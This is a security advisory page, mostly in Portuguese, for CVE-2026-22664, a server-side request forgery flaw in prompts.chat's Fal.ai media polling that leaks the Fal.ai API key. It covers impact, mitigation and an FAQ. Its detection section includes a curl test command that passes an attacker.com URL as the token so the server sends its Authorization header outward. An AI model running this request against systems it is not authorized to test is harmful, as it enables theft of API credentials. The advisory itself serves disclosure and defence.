Plataforma
nodejs
Componente
prompts-chat
Corrigido em
30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99
Uma vulnerabilidade de Server-Side Request Forgery (SSRF) foi descoberta em prompts.chat, especificamente na função de polling de status de mídia do Fal.ai. Esta falha permite que usuários autenticados realizem requisições outbound arbitrárias, potencialmente expondo informações sensíveis e comprometendo a segurança da aplicação. A vulnerabilidade afeta versões anteriores à 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 e foi corrigida nessa versão.
A exploração bem-sucedida desta vulnerabilidade SSRF permite que um atacante realize requisições HTTP arbitrárias em nome do servidor prompts.chat. Isso pode levar à divulgação de informações confidenciais, como a chave de API do Fal.ai (FALAPIKEY), que é transmitida no cabeçalho de autorização. Com a posse dessa chave, um atacante pode abusar da conta da vítima, realizar varreduras na rede interna e potencialmente comprometer outros sistemas conectados. A falta de validação adequada das URLs fornecidas pelo usuário é a raiz do problema, abrindo caminho para a exploração.
A vulnerabilidade foi divulgada em 03 de abril de 2026. Não há informações disponíveis sobre a adição à KEV (CISA KEV) ou sobre a existência de exploits públicos. A descrição indica que a falta de validação de URL é a causa, o que pode facilitar a exploração por atacantes com conhecimento técnico. A ausência de um exploit público não significa que a vulnerabilidade não seja um risco, especialmente em ambientes onde a autenticação é fraca ou as políticas de acesso são permissivas.
Organizations utilizing prompts.chat for internal communication or AI-powered chatbot applications are at risk. Specifically, deployments that rely on Fal.ai for media processing or storage are particularly vulnerable. Shared hosting environments where multiple users share the same prompts.chat instance should be carefully assessed, as a compromised account could impact other users.
• nodejs / server: Monitor application logs for outbound requests to unusual or unexpected domains. Use lsof or netstat to identify processes making outbound connections to suspicious IP addresses or ports.
lsof -i | grep prompts.chat• generic web: Use curl to test the media status polling endpoint with a crafted URL containing a known malicious domain. Examine the response headers for any signs of credential leakage.
curl -v 'https://your-prompts-chat-instance/api/media_status?token=https://attacker.com' 2>&1 | grep Authorizationdisclosure
Status do Exploit
EPSS
0.03% (percentil 9%)
CISA SSVC
Vetor CVSS
A mitigação primária para esta vulnerabilidade é a atualização imediata para a versão corrigida (30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99) do prompts.chat. Se a atualização imediata não for possível, considere implementar regras de firewall ou proxy para restringir as requisições outbound permitidas pelo servidor. Além disso, revise e reforce as políticas de controle de acesso para garantir que apenas usuários autorizados tenham acesso às funcionalidades afetadas. Monitore logs de acesso e erros em busca de atividades suspeitas, como requisições para URLs inesperadas ou tentativas de acesso não autorizado.
Atualize prompts.chat para a versão que inclui o commit 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99. Esta correção valida as URLs fornecidas no parâmetro token durante o polling do status de mídia do Fal.ai, mitigando a vulnerabilidade SSRF.
Análise de vulnerabilidades e alertas críticos diretamente no seu e-mail.
CVE-2026-22664 is a server-side request forgery vulnerability in prompts.chat that allows attackers to disclose sensitive API keys by manipulating URLs.
You are affected if you are using prompts.chat versions prior to 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99.
Upgrade to version 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 or later. Implement WAF rules to block suspicious outbound requests.
There is currently no confirmed active exploitation, but the vulnerability's potential for credential theft makes it a likely target.
Refer to the prompts.chat release notes and security advisories on their official website or GitHub repository.
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.